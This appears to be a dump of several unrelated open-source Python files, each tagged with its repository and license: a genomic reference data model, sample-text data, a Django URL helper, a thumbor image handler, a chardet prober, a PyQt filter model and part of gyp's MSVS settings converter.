        Returns the length of this reference's sequence string.
        """
        return self._length

    def getName(self):
        """
        Returns the name of this reference, e.g., '22'.
        """
        return self.getLocalId()

    def getIsDerived(self):
        """
        Returns True if this Reference is derived. A sequence X is said to be
        derived from source sequence Y, if X and Y are of the same length and
        the per-base sequence divergence at A/C/G/T bases is sufficiently
        small. Two sequences derived from the same official sequence share the
        same coordinates and annotations, and can be replaced with the official
        sequence for certain use cases.
        """
        return self._isDerived

    def getSourceDivergence(self):
        """
        Returns the source divergence for this reference. The sourceDivergence
        is the fraction of non-indel bases that do not match the
        reference this record was derived from.
        """
        return self._sourceDivergence

    def getSourceAccessions(self):
        """
        Returns the list of source accession strings. These are all known
        corresponding accession IDs in INSDC (GenBank/ENA/DDBJ) ideally
        with a version number, e.g. `NC_000001.11`.
        """
        return self._sourceAccessions

    def getSourceUri(self):
        """
        The URI from which the sequence was obtained. Specifies a FASTA format
        file/string with one name, sequence pair.
        """
        return self._sourceUri

    def getNcbiTaxonId(self):
        """
        Returns the NCBI Taxon ID for this reference. This is the
        ID from http://www.ncbi.nlm.nih.gov/taxonomy (e.g. 9606->human)
        indicating the species which this assembly is intended to model.
        Note that contained `Reference`s may specify a different
        `ncbiTaxonId`, as assemblies may contain reference sequences
        which do not belong to the modeled species, e.g. EBV in a
        human reference genome.
        """
        return self._ncbiTaxonId

    def getMd5Checksum(self):
        """
        Returns the MD5 checksum uniquely representing this `Reference` as a
        lower-case hexadecimal string, calculated as the MD5 of the upper-case
        sequence excluding all whitespace characters.
        """
        return self._md5checksum

    def toProtocolElement(self):
        """
        Returns the GA4GH protocol representation of this Reference.
        """
        reference = protocol.Reference()
        reference.id = self.getId()
        reference.isDerived = self.getIsDerived()
        reference.length = self.getLength()
        reference.md5checksum = self.getMd5Checksum()
        reference.name = self.getName()
        reference.ncbiTaxonId = self.getNcbiTaxonId()
        reference.sourceAccessions = self.getSourceAccessions()
        reference.sourceDivergence = self.getSourceDivergence()
        reference.sourceURI = self.getSourceUri()
        return reference

    def checkQueryRange(self, start, end):
        """
        Checks to ensure that the query range is valid within this reference.
        If not, raise ReferenceRangeErrorException.
        """
        condition = (
            (start < 0 or end > self.getLength()) or
            start > end)
        if condition:
            raise exceptions.ReferenceRangeErrorException(
                self.getId(), start, end)

    def getBases(self, start, end):
        """
        Returns the string representing the bases of this reference from
        start (inclusive) to end (exclusive).  Subclasses must override.
        """
        # BUGFIX: this previously did `raise NotImplemented()`.
        # NotImplemented is a non-callable singleton, so calling the base
        # method died with a confusing TypeError instead of the intended
        # NotImplementedError.
        raise NotImplementedError()
##################################################################
#
# Simulated references
#
##################################################################
class SimulatedReferenceSet(AbstractReferenceSet):
    """
    A simulated referenceSet whose metadata and member references are
    generated pseudo-randomly from `randomSeed`.
    """
    def __init__(self, localId, randomSeed=0, numReferences=1):
        super(SimulatedReferenceSet, self).__init__(localId)
        self._randomSeed = randomSeed
        self._randomGenerator = random.Random()
        self._randomGenerator.seed(self._randomSeed)
        self._description = "Simulated reference set"
        # BUGFIX: metadata was previously drawn from the module-level
        # `random` generator, so the simulated set was not reproducible for
        # a given randomSeed.  Use the seeded per-instance generator.
        rng = self._randomGenerator
        self._assemblyId = str(rng.randint(0, 2**32))
        self._isDerived = bool(rng.randint(0, 1))
        self._ncbiTaxonId = rng.randint(0, 2**16)
        self._sourceAccessions = []
        for i in range(rng.randint(1, 3)):
            self._sourceAccessions.append("sim_accession_{}".format(
                rng.randint(1, 2**32)))
        self._sourceUri = "http://example.com/reference.fa"
        # Each member reference gets its own derived seed so it is also
        # deterministic.
        for i in range(numReferences):
            referenceSeed = rng.getrandbits(32)
            referenceLocalId = "srs{}".format(i)
            reference = SimulatedReference(
                self, referenceLocalId, referenceSeed)
            self.addReference(reference)
class SimulatedReference(AbstractReference):
    """
    A simulated reference. Stores a random sequence of a given length, and
    generates remaining attributes randomly from `randomSeed`.
    """
    def __init__(self, parentContainer, localId, randomSeed=0, length=200):
        super(SimulatedReference, self).__init__(parentContainer, localId)
        rng = random.Random()
        rng.seed(randomSeed)
        self._length = length
        bases = [rng.choice('ACGT') for _ in range(self._length)]
        self._bases = ''.join(bases)
        # encode() so the digest also works under Python 3, where md5()
        # requires bytes; for this ASCII alphabet the digest is unchanged.
        self._md5checksum = hashlib.md5(
            self._bases.encode('utf-8')).hexdigest()
        self._isDerived = bool(rng.randint(0, 1))
        self._sourceDivergence = 0
        if self._isDerived:
            self._sourceDivergence = rng.uniform(0, 0.1)
        # BUGFIX: these attributes previously used the module-level `random`
        # generator, breaking reproducibility for a given randomSeed.  Use
        # the seeded per-instance generator throughout.
        self._ncbiTaxonId = rng.randint(0, 2**16)
        self._sourceAccessions = []
        for i in range(rng.randint(1, 3)):
            self._sourceAccessions.append("sim_accession_{}".format(
                rng.randint(1, 2**32)))
        self._sourceUri = "http://example.com/reference.fa"

    def getBases(self, start, end):
        """Return the simulated bases in [start, end)."""
        self.checkQueryRange(start, end)
        return self._bases[start:end]
##################################################################
#
# References based on htslib's FASTA file handling.
#
##################################################################
class HtslibReferenceSet(datamodel.PysamDatamodelMixin, AbstractReferenceSet):
    """
    A referenceSet backed by bgzipped FASTA files (plus JSON metadata
    sidecars) stored on the file system.
    """
    def __init__(self, localId, dataDir, backend):
        super(HtslibReferenceSet, self).__init__(localId)
        self._dataDir = dataDir
        self._setMetadata()
        self._scanDataFiles(dataDir, ["*.fa.gz"])

    def _setMetadata(self):
        """Load reference-set level metadata from '<dataDir>.json'."""
        metadataFileName = '{}.json'.format(self._dataDir)
        with open(metadataFileName) as metadataFile:
            metadata = json.load(metadataFile)
        # Copy the required keys onto the corresponding private attributes;
        # any missing key is reported as MissingReferenceSetMetadata.
        try:
            for key in ('assemblyId', 'description', 'isDerived',
                        'ncbiTaxonId', 'sourceAccessions', 'sourceUri'):
                setattr(self, '_' + key, metadata[key])
        except KeyError as err:
            raise exceptions.MissingReferenceSetMetadata(
                metadataFileName, str(err))

    def _addDataFile(self, path):
        """Create an HtslibReference for the FASTA file at *path*, reading
        its per-reference metadata from the matching '<localId>.json'."""
        directory, fileName = os.path.split(path)
        localId = fileName.split(".")[0]
        metadataPath = os.path.join(directory, "{}.json".format(localId))
        with open(metadataPath) as metadataFile:
            metadata = json.load(metadataFile)
        self.addReference(HtslibReference(self, localId, path, metadata))
class HtslibReference(datamodel.PysamDatamodelMixin, AbstractReference):
    """
    A reference based on data stored in a file on the file system
    """
    def __init__(self, parentContainer, localId, dataFile, metadata):
        super(HtslibReference, self).__init__(parentContainer, localId)
        self._fastaFilePath = dataFile
        fastaFile = self.getFileHandle(dataFile)
        # Each backing FASTA must contain exactly one sequence, and that
        # sequence must be named after this reference's local id.
        numReferences = len(fastaFile.references)
        if numReferences != 1:
            raise exceptions.NotExactlyOneReferenceException(
                self._fastaFilePath, numReferences)
        if fastaFile.references[0] != localId:
            raise exceptions.InconsistentReferenceNameException(
                self._fastaFilePath)
        self._length = fastaFile.lengths[0]
        # The remaining attributes come from the sidecar JSON metadata; a
        # missing key is surfaced as MissingReferenceMetadata.
        try:
            self._md5checksum = metadata["md5checksum"]
            self._sourceUri = metadata["sourceUri"]
            self._ncbiTaxonId = metadata["ncbiTaxonId"]
            self._isDerived = metadata["isDerived"]
            self._sourceDivergence = metadata["sourceDivergence"]
            self._sourceAccessions = metadata["sourceAccessions"]
        except KeyError as err:
            raise exceptions.MissingReferenceMetadata(dataFile, str(err))

    def getFastaFilePath(self):
        """
        Returns the fasta file that this reference is derived from.
        """
        return self._fastaFilePath

    def openFile(self, dataFile):
        # Factory hook used by PysamDatamodelMixin's getFileHandle caching.
        return pysam.FastaFile(dataFile)

    def getBases(self, start, end):
        """
        Returns the bases in [start, end) fetched from the backing FASTA.
        """
        self.checkQueryRange(start, end)
        fastaFile = self.getFileHandle(self._fastaFilePath)
        # TODO we should have some error checking here...
        bases = fastaFile.fetch(self.getLocalId(), start, end)
        return bases
| apache-2.0 |
SarathkumarJ/snapboard | snapboard/sampledata.py | 4 | 4553 | #
# Sample data for testing
#
leadins = """To characterize a linguistic level L,
On the other hand,
This suggests that
It appears that
Furthermore,
We will bring evidence in favor of the following thesis:
To provide a constituent structure for T(Z,K),
From C1, it follows that
For any transformation which is sufficiently diversified in application to be of any interest,
Analogously,
Clearly,
Note that
Of course,
Suppose, for instance, that
Thus
With this clarification,
Conversely,
We have already seen that
By combining adjunctions and certain deformations,
I suggested that these results would follow from the assumption that
If the position of the trace in (99c) were only relatively inaccessible to movement,
However, this assumption is not correct, since
Comparing these examples with their parasitic gap counterparts in (96) and (97), we see that
In the discussion of resumptive pronouns following (81),
So far,
Nevertheless,
For one thing,
Summarizing, then, we assume that
A consequence of the approach just outlined is that
Presumably,
On our assumptions,
It may be, then, that
It must be emphasized, once again, that
Let us continue to suppose that
Notice, incidentally, that """
# List of LEADINs to buy time.
subjects = """ the notion of level of grammaticalness
a case of semigrammaticalness of a different sort
most of the methodological work in modern linguistics
a subset of English sentences interesting on quite independent grounds
the natural general principle that will subsume this case
an important property of these three types of EC
any associated supporting element
the appearance of parasitic gaps in domains relatively inaccessible to ordinary extraction
the speaker-hearer's linguistic intuition
the descriptive power of the base component
the earlier discussion of deviance
this analysis of a formative as a pair of sets of features
this selectionally introduced contextual feature
a descriptively adequate grammar
the fundamental error of regarding functional notions as categorial
relational information
the systematic use of complex symbols
the theory of syntactic features developed earlier"""
# List of SUBJECTs chosen for maximum professorial macho.
verbs = """can be defined in such a way as to impose
delimits
suffices to account for
cannot be arbitrary in
is not subject to
does not readily tolerate
raises serious doubts about
is not quite equivalent to
does not affect the structure of
may remedy and, at the same time, eliminate
is not to be considered in determining
is to be regarded as
is unspecified with respect to
is, apparently, determined by
is necessary to impose an interpretation on
appears to correlate rather closely with
is rather different from"""
#List of VERBs chosen for autorecursive obfuscation.
objects = """ problems of phonemic and morphological analysis.
a corpus of utterance tokens upon which conformity has been defined by the paired utterance test.
the traditional practice of grammarians.
the levels of acceptability from fairly high (e.g. (99a)) to virtual gibberish (e.g. (98d)).
a stipulation to place the constructions into these various categories.
a descriptive fact.
a parasitic gap construction.
the extended c-command discussed in connection with (34).
the ultimate standard that determines the accuracy of any proposed grammar.
the system of base rules exclusive of the lexicon.
irrelevant intervening contexts in selectional rules.
nondistinctness in the sense of distinctive feature theory.
a general convention regarding the forms of the grammar.
an abstract underlying order.
an important distinction in language use.
the requirement that branching is not tolerated within the dominance scope of a complex symbol.
the strong generative capacity of the theory."""
# List of OBJECTs selected for profound sententiousness.
import textwrap, random
from itertools import chain, islice, izip
def sample_data(times=1, line_length=72):
    """Return *times* pseudo-random Chomsky-style sentences, joined by
    spaces.  Each sentence is a shuffled leadin/subject/verb/object pick.

    NOTE(review): line_length is accepted for interface compatibility but
    is not used by this implementation.
    """
    pools = []
    for text in (leadins, subjects, verbs, objects):
        phrases = [phrase.strip() for phrase in text.splitlines()]
        random.shuffle(phrases)
        pools.append(phrases)
    # Zip one phrase from each pool into a sentence tuple, take the first
    # `times` sentences, and flatten them into a single phrase stream.
    sentences = islice(izip(*pools), 0, times)
    return ' '.join(chain(*sentences))
# vim: ai ts=4 sts=4 et sw=4
| bsd-3-clause |
atizo/kluster | src/kluster/core/utils.py | 1 | 1079 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Kluster - A clustering Web Service
#
# Copyright (C) 2011 Atizo AG and individual contributors (see AUTHORS).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from django.conf import settings
def get_platrom_url(request=None):
    """Return the platform URL for *request*.

    Uses the request's SERVER_NAME when a request is given and carries one;
    otherwise falls back to settings.PLATFORM_URL.

    NOTE: the function name is misspelled ('platrom'); it is kept for
    backward compatibility -- prefer the get_platform_url alias below.
    """
    if request:
        platform_url = request.META.get('SERVER_NAME')
        if platform_url:
            return platform_url
    return settings.PLATFORM_URL


# Correctly spelled alias for new callers; the misspelled original name is
# retained so existing imports keep working.
get_platform_url = get_platrom_url
| gpl-3.0 |
felipemorais/thumbor | thumbor/handlers/image_resource.py | 11 | 2698 | #!/usr/bin/python
# -*- coding: utf-8 -*-
# thumbor imaging service
# https://github.com/globocom/thumbor/wiki
# Licensed under the MIT license:
# http://www.opensource.org/licenses/mit-license
# Copyright (c) 2011 globo.com timehome@corp.globo.com
import datetime
from thumbor.handlers import ImageApiHandler
from thumbor.engines import BaseEngine
import tornado.gen as gen
import tornado.web
##
# Handler to retrieve or modify existing images
# This handler support GET, PUT and DELETE method to manipulate existing images
##
class ImageResourceHandler(ImageApiHandler):
    """Handler for existing images: GET/HEAD retrieve, PUT replaces and
    DELETE removes an uploaded image, addressed by its storage id."""

    @gen.coroutine
    def check_resource(self, id):
        """Fetch the stored image for *id* and write it to the response,
        answering 404 when storage has no such entry."""
        # Ids are truncated to the configured maximum length before lookup.
        id = id[:self.context.config.MAX_ID_LENGTH]
        # Check if image exists
        exists = yield gen.maybe_future(self.context.modules.storage.exists(id))
        if exists:
            body = yield gen.maybe_future(self.context.modules.storage.get(id))
            self.set_status(200)
            # Sniff the mime type from the stored bytes; the header is only
            # set when detection succeeds.
            mime = BaseEngine.get_mimetype(body)
            if mime:
                self.set_header('Content-Type', mime)
            max_age = self.context.config.MAX_AGE
            if max_age:
                self.set_header('Cache-Control', 'max-age=' + str(max_age) + ',public')
                self.set_header('Expires', datetime.datetime.utcnow() + datetime.timedelta(seconds=max_age))
            self.write(body)
            self.finish()
        else:
            self._error(404, 'Image not found at the given URL')

    def put(self, id):
        """Overwrite the image stored under *id*; 405 unless PUT is allowed
        by configuration."""
        id = id[:self.context.config.MAX_ID_LENGTH]
        # Check if image overwriting is allowed
        if not self.context.config.UPLOAD_PUT_ALLOWED:
            self._error(405, 'Unable to modify an uploaded image')
            return
        # Check if the image uploaded is valid
        if self.validate(self.request.body):
            self.write_file(id, self.request.body)
            self.set_status(204)

    @tornado.web.asynchronous
    @tornado.gen.coroutine
    def delete(self, id):
        """Delete the image stored under *id*; 405 unless DELETE is allowed,
        404 when the image does not exist."""
        id = id[:self.context.config.MAX_ID_LENGTH]
        # Check if image deleting is allowed
        if not self.context.config.UPLOAD_DELETE_ALLOWED:
            self._error(405, 'Unable to delete an uploaded image')
            return
        # Check if image exists
        exists = yield gen.maybe_future(self.context.modules.storage.exists(id))
        if exists:
            self.context.modules.storage.remove(id)
            self.set_status(204)
        else:
            self._error(404, 'Image not found at the given URL')

    @tornado.web.asynchronous
    def get(self, id):
        # NOTE(review): check_resource is a coroutine invoked without yield;
        # with @tornado.web.asynchronous the connection stays open until the
        # coroutine calls finish()/_error -- confirm before restructuring.
        self.check_resource(id)

    @tornado.web.asynchronous
    def head(self, id):
        self.check_resource(id)
| mit |
noba3/KoTos | addons/plugin.program.iptvxtra/resources/lib/requests/packages/chardet/gb2312prober.py | 2994 | 1681 | ######################## BEGIN LICENSE BLOCK ########################
# The Original Code is mozilla.org code.
#
# The Initial Developer of the Original Code is
# Netscape Communications Corporation.
# Portions created by the Initial Developer are Copyright (C) 1998
# the Initial Developer. All Rights Reserved.
#
# Contributor(s):
# Mark Pilgrim - port to Python
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA
# 02110-1301 USA
######################### END LICENSE BLOCK #########################
from .mbcharsetprober import MultiByteCharSetProber
from .codingstatemachine import CodingStateMachine
from .chardistribution import GB2312DistributionAnalysis
from .mbcssm import GB2312SMModel
class GB2312Prober(MultiByteCharSetProber):
    """A multi-byte charset prober wired up with the GB2312 coding state
    machine and character-distribution analyser."""

    def __init__(self):
        super(GB2312Prober, self).__init__()
        # Plug in the GB2312-specific state machine and distribution model,
        # then reset so the prober starts from a clean state.
        self._mDistributionAnalyzer = GB2312DistributionAnalysis()
        self._mCodingSM = CodingStateMachine(GB2312SMModel)
        self.reset()

    def get_charset_name(self):
        """Return the canonical name of the charset this prober detects."""
        return "GB2312"
| gpl-2.0 |
ergoregion/Rota-Program | Rota_System/UI/Candidating/model_population_filter.py | 1 | 1650 | __author__ = 'Neil Butcher'
from PyQt4 import QtGui
class PopulationSortFilterModel(QtGui.QSortFilterProxyModel):
    """Proxy model that filters and sorts a population source model using
    pluggable filter objects (each exposing mask(person)) and an optional
    sorter object (exposing lessThan(a, b))."""

    def __init__(self, parent):
        # BUGFIX: this previously initialised QtGui.QAbstractProxyModel
        # instead of the actual base class, skipping QSortFilterProxyModel's
        # own initialisation.
        QtGui.QSortFilterProxyModel.__init__(self, parent)
        self.setDynamicSortFilter(True)
        self._filters = []       # person hidden when filter.mask(person)
        self._antifilters = []   # person hidden when NOT filter.mask(person)
        self._sorter = None      # optional object providing lessThan(a, b)

    def set_sorter(self, new_sorter):
        """Install *new_sorter* and re-sort/re-filter the proxy."""
        self._sorter = new_sorter
        self.invalidate()

    def clear_filters(self):
        """Remove all filters and re-evaluate row visibility."""
        self._filters = []
        self._antifilters = []
        self.invalidateFilter()

    def set_filters(self, new_filters):
        """Replace the list of (positive) filters."""
        self._filters = new_filters
        self.invalidateFilter()

    def add_filter(self, new_filter):
        """Add a filter that hides persons it masks."""
        self._filters.append(new_filter)
        self.invalidateFilter()

    def add_reversed_filter(self, new_filter):
        """Add a filter that hides persons it does NOT mask."""
        self._antifilters.append(new_filter)
        self.invalidateFilter()

    def filterAcceptsRow(self, source_row, source_parent):
        """Qt hook: a person is shown only if no filter masks it and every
        reversed filter masks it."""
        person = self.sourceModel().population[source_row]
        for f in self._filters:
            if f.mask(person):
                return False
        for f in self._antifilters:
            if not f.mask(person):
                return False
        return True

    def lessThan(self, left_index, right_index):
        """Qt hook: delegate ordering to the installed sorter, if any."""
        if not self._sorter:
            return False
        left_person = self.sourceModel().object(left_index)
        right_person = self.sourceModel().object(right_index)
        return self._sorter.lessThan(left_person, right_person)

    def object(self, index):
        """Return the source-model object behind a proxy *index*."""
        source_index = self.mapToSource(index)
        return self.sourceModel().object(source_index)
| mit |
holoju/agetic-impuestos | node_modules/node-gyp/gyp/pylib/gyp/MSVSSettings.py | 1361 | 45045 | # Copyright (c) 2012 Google Inc. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
r"""Code to validate and convert settings of the Microsoft build tools.
This file contains code to validate and convert settings of the Microsoft
build tools. The function ConvertToMSBuildSettings(), ValidateMSVSSettings(),
and ValidateMSBuildSettings() are the entry points.
This file was created by comparing the projects created by Visual Studio 2008
and Visual Studio 2010 for all available settings through the user interface.
The MSBuild schemas were also considered. They are typically found in the
MSBuild install directory, e.g. c:\Program Files (x86)\MSBuild
"""
import sys
import re
# Dictionaries of settings validators. The key is the tool name, the value is
# a dictionary mapping setting names to validation functions.
# All four registries below are populated at import time by _AddTool and the
# _Same/_Renamed/_Moved/... helper functions further down in this module.
_msvs_validators = {}
_msbuild_validators = {}
# A dictionary of settings converters. The key is the tool name, the value is
# a dictionary mapping setting names to conversion functions.
_msvs_to_msbuild_converters = {}
# Tool name mapping from MSVS to MSBuild.
_msbuild_name_of_tool = {}
class _Tool(object):
  """A build tool known under both its MSVS and its MSBuild name.

  Attributes:
    msvs_name: name of the tool in MSVS project files.
    msbuild_name: name of the tool in MSBuild project files.
  """

  def __init__(self, msvs_name, msbuild_name):
    self.msvs_name, self.msbuild_name = msvs_name, msbuild_name
def _AddTool(tool):
  """Registers a tool in the four module-level settings registries.

  Only the tool itself is declared here; each of its settings must be
  registered separately via the _Same/_Renamed/... helpers.

  Args:
    tool: the _Tool object to register.
  """
  msvs, msbuild = tool.msvs_name, tool.msbuild_name
  _msvs_validators[msvs] = {}
  _msbuild_validators[msbuild] = {}
  _msvs_to_msbuild_converters[msvs] = {}
  _msbuild_name_of_tool[msvs] = msbuild
def _GetMSBuildToolSettings(msbuild_settings, tool):
  """Fetches the MSBuild settings dict for a tool, creating it on demand."""
  tool_settings = msbuild_settings.setdefault(tool.msbuild_name, {})
  return tool_settings
class _Type(object):
  """Base class describing the type of a setting.

  Subclasses override the three hooks below; the defaults accept every
  value and convert by identity.
  """

  def ValidateMSVS(self, value):
    """Raises ValueError when *value* is not legal for MSVS.

    Args:
      value: the value to check for this type.
    """

  def ValidateMSBuild(self, value):
    """Raises ValueError when *value* is not legal for MSBuild.

    Args:
      value: the value to check for this type.
    """

  def ConvertToMSBuild(self, value):
    """Returns the MSBuild equivalent of an MSVS *value*.

    Raises ValueError when *value* is not valid; the base implementation
    passes the value through unchanged.
    """
    return value
class _String(_Type):
  """A setting whose value is a plain string."""

  def _CheckString(self, value):
    # Shared validation: both build systems accept any string here.
    if not isinstance(value, basestring):
      raise ValueError('expected string; got %r' % value)

  def ValidateMSVS(self, value):
    self._CheckString(value)

  def ValidateMSBuild(self, value):
    self._CheckString(value)

  def ConvertToMSBuild(self, value):
    # MSVS macros such as $(InputName) must be rewritten for MSBuild.
    return ConvertVCMacrosToMSBuild(value)
class _StringList(_Type):
  """A setting whose value is a list of strings (a bare string also passes)."""

  def _CheckStringList(self, value):
    if not isinstance(value, (basestring, list)):
      raise ValueError('expected string list; got %r' % value)

  def ValidateMSVS(self, value):
    self._CheckStringList(value)

  def ValidateMSBuild(self, value):
    self._CheckStringList(value)

  def ConvertToMSBuild(self, value):
    # Rewrite MSVS macros element-wise; a bare string is converted directly.
    if not isinstance(value, list):
      return ConvertVCMacrosToMSBuild(value)
    return [ConvertVCMacrosToMSBuild(item) for item in value]
class _Boolean(_Type):
  """A setting restricted to the literal strings 'true' and 'false'."""

  def _Validate(self, value):
    if value not in ('true', 'false'):
      raise ValueError('expected bool; got %r' % value)

  def ValidateMSVS(self, value):
    self._Validate(value)

  def ValidateMSBuild(self, value):
    self._Validate(value)

  def ConvertToMSBuild(self, value):
    # Same spelling on both sides, but still reject anything else.
    self._Validate(value)
    return value
class _Integer(_Type):
  """An integer setting, rendered for MSBuild in decimal or 4-digit hex."""

  def __init__(self, msbuild_base=10):
    _Type.__init__(self)
    # 10 -> '%d' rendering; anything else (16 in practice) -> '0x%04x'.
    self._msbuild_base = msbuild_base

  def ValidateMSVS(self, value):
    # Conversion raises ValueError on bad input, which is the contract.
    self.ConvertToMSBuild(value)

  def ValidateMSBuild(self, value):
    # int() raises ValueError when value is not valid in the target base.
    int(value, self._msbuild_base)

  def ConvertToMSBuild(self, value):
    if self._msbuild_base == 10:
      return '%d' % int(value)
    return '0x%04x' % int(value)
class _Enumeration(_Type):
  """An enumerated setting.

  MSVS stores these as numeric indexes ('0', '1', ...); MSBuild uses
  descriptive labels such as 'Win32'.

  Constructor args:
    label_list: MSBuild labels indexed by the MSVS value; None marks an
        index that MSVS skipped and never used.
    new: extra labels that exist only in MSBuild.
  """

  def __init__(self, label_list, new=None):
    _Type.__init__(self)
    self._label_list = label_list
    self._msbuild_values = set(label for label in label_list
                               if label is not None)
    if new is not None:
      self._msbuild_values.update(new)

  def ValidateMSVS(self, value):
    # Conversion raises on anything out of range or unmapped.
    self.ConvertToMSBuild(value)

  def ValidateMSBuild(self, value):
    if value not in self._msbuild_values:
      raise ValueError('unrecognized enumerated value %s' % value)

  def ConvertToMSBuild(self, value):
    index = int(value)
    if not 0 <= index < len(self._label_list):
      raise ValueError('index value (%d) not in expected range [0, %d)' %
                       (index, len(self._label_list)))
    label = self._label_list[index]
    if label is None:
      raise ValueError('converted value for %s not specified.' % value)
    return label
# Instantiate the various generic types.
_boolean = _Boolean()
_integer = _Integer()
# For now, we don't do any special validation on these types:
# the distinct names (file vs folder, single vs list) document intent
# at the registration sites even though the checks are identical today.
_string = _String()
_file_name = _String()
_folder_name = _String()
_file_list = _StringList()
_folder_list = _StringList()
_string_list = _StringList()
# Some boolean settings went from numerical values to boolean.  The
# mapping is 0: default, 1: false, 2: true.
_newly_boolean = _Enumeration(['', 'false', 'true'])
def _Same(tool, name, setting_type):
  """Defines a setting whose name is identical in MSVS and MSBuild.

  Args:
    tool: a dictionary that gives the names of the tool for MSVS and MSBuild.
    name: the name of the setting on both sides.
    setting_type: the type of this setting.
  """
  _Renamed(tool, name, name, setting_type)
def _Renamed(tool, msvs_name, msbuild_name, setting_type):
  """Defines a setting whose name differs between MSVS and MSBuild.

  Args:
    tool: a dictionary that gives the names of the tool for MSVS and MSBuild.
    msvs_name: the name of the MSVS setting.
    msbuild_name: the name of the MSBuild setting.
    setting_type: the type of this setting.
  """

  def _Translate(value, msbuild_settings):
    # Write the converted value under the tool's MSBuild settings.
    target = _GetMSBuildToolSettings(msbuild_settings, tool)
    target[msbuild_name] = setting_type.ConvertToMSBuild(value)

  _msvs_validators[tool.msvs_name][msvs_name] = setting_type.ValidateMSVS
  _msbuild_validators[tool.msbuild_name][msbuild_name] = (
      setting_type.ValidateMSBuild)
  _msvs_to_msbuild_converters[tool.msvs_name][msvs_name] = _Translate
def _Moved(tool, settings_name, msbuild_tool_name, setting_type):
  """Defines a setting that moved to another MSBuild tool, keeping its name."""
  _MovedAndRenamed(tool, settings_name, msbuild_tool_name, settings_name,
                   setting_type)
def _MovedAndRenamed(tool, msvs_settings_name, msbuild_tool_name,
                     msbuild_settings_name, setting_type):
  """Defines a setting that moved to a new section and may be renamed.

  Args:
    tool: a dictionary that gives the names of the tool for MSVS and MSBuild.
    msvs_settings_name: the MSVS name of the setting.
    msbuild_tool_name: the name of the MSBuild tool to place the setting under.
    msbuild_settings_name: the MSBuild name of the setting.
    setting_type: the type of this setting.
  """

  def _Translate(value, msbuild_settings):
    dest = msbuild_settings.setdefault(msbuild_tool_name, {})
    dest[msbuild_settings_name] = setting_type.ConvertToMSBuild(value)

  _msvs_validators[tool.msvs_name][msvs_settings_name] = (
      setting_type.ValidateMSVS)
  _msbuild_validators[msbuild_tool_name][msbuild_settings_name] = (
      setting_type.ValidateMSBuild)
  _msvs_to_msbuild_converters[tool.msvs_name][msvs_settings_name] = _Translate
def _MSVSOnly(tool, name, setting_type):
  """Defines a setting that exists only in MSVS; it is dropped on conversion.

  Args:
    tool: a dictionary that gives the names of the tool for MSVS and MSBuild.
    name: the name of the setting.
    setting_type: the type of this setting.
  """

  def _Ignore(unused_value, unused_msbuild_settings):
    # MSVS-only: nothing is written into the MSBuild settings.
    pass

  _msvs_validators[tool.msvs_name][name] = setting_type.ValidateMSVS
  _msvs_to_msbuild_converters[tool.msvs_name][name] = _Ignore
def _MSBuildOnly(tool, name, setting_type):
  """Defines a setting found only in MSBuild.

  If the setting nevertheless appears among the MSVS settings, its value
  is copied through to MSBuild unchanged.

  Args:
    tool: a dictionary that gives the names of the tool for MSVS and MSBuild.
    name: the name of the setting.
    setting_type: the type of this setting.
  """

  def _CopyThrough(value, msbuild_settings):
    msbuild_settings.setdefault(tool.msbuild_name, {})[name] = value

  _msbuild_validators[tool.msbuild_name][name] = setting_type.ValidateMSBuild
  _msvs_to_msbuild_converters[tool.msvs_name][name] = _CopyThrough
def _ConvertedToAdditionalOption(tool, msvs_name, flag):
  """Defines a boolean MSVS setting that becomes a raw flag in MSBuild.

  When the MSVS value is 'true', *flag* is appended to the tool's
  AdditionalOptions string.

  Args:
    tool: a dictionary that gives the names of the tool for MSVS and MSBuild.
    msvs_name: the name of the MSVS setting that, if 'true', becomes a flag.
    flag: the flag to append to AdditionalOptions.
  """

  def _Translate(value, msbuild_settings):
    if value != 'true':
      return
    tool_settings = _GetMSBuildToolSettings(msbuild_settings, tool)
    if 'AdditionalOptions' in tool_settings:
      tool_settings['AdditionalOptions'] += ' ' + flag
    else:
      tool_settings['AdditionalOptions'] = flag

  _msvs_validators[tool.msvs_name][msvs_name] = _boolean.ValidateMSVS
  _msvs_to_msbuild_converters[tool.msvs_name][msvs_name] = _Translate
def _CustomGeneratePreprocessedFile(tool, msvs_name):
  """Registers GeneratePreprocessedFile, which needs custom processing.

  One MSVS enum ('0'/'1'/'2') fans out into two MSBuild booleans,
  PreprocessToFile and PreprocessSuppressLineNumbers.
  """

  def _Translate(value, msbuild_settings):
    tool_settings = _GetMSBuildToolSettings(msbuild_settings, tool)
    if value == '0':
      to_file, suppress = 'false', 'false'
    elif value == '1':  # /P
      to_file, suppress = 'true', 'false'
    elif value == '2':  # /EP /P
      to_file, suppress = 'true', 'true'
    else:
      raise ValueError('value must be one of [0, 1, 2]; got %s' % value)
    tool_settings['PreprocessToFile'] = to_file
    tool_settings['PreprocessSuppressLineNumbers'] = suppress

  # MSVS side accepts exactly the indexes '0', '1' and '2'; a three-label
  # dummy enumeration provides exactly that check.
  _msvs_validators[tool.msvs_name][msvs_name] = (
      _Enumeration(['a', 'b', 'c']).ValidateMSVS)
  bool_validator = _boolean.ValidateMSBuild
  for msbuild_name in ('PreprocessToFile', 'PreprocessSuppressLineNumbers'):
    _msbuild_validators[tool.msbuild_name][msbuild_name] = bool_validator
  _msvs_to_msbuild_converters[tool.msvs_name][msvs_name] = _Translate
# Macros that already expand with a trailing slash; FixVCMacroSlashes strips
# any extra [\\/] run that immediately follows them.
fix_vc_macro_slashes_regex_list = ('IntDir', 'OutDir')
fix_vc_macro_slashes_regex = re.compile(
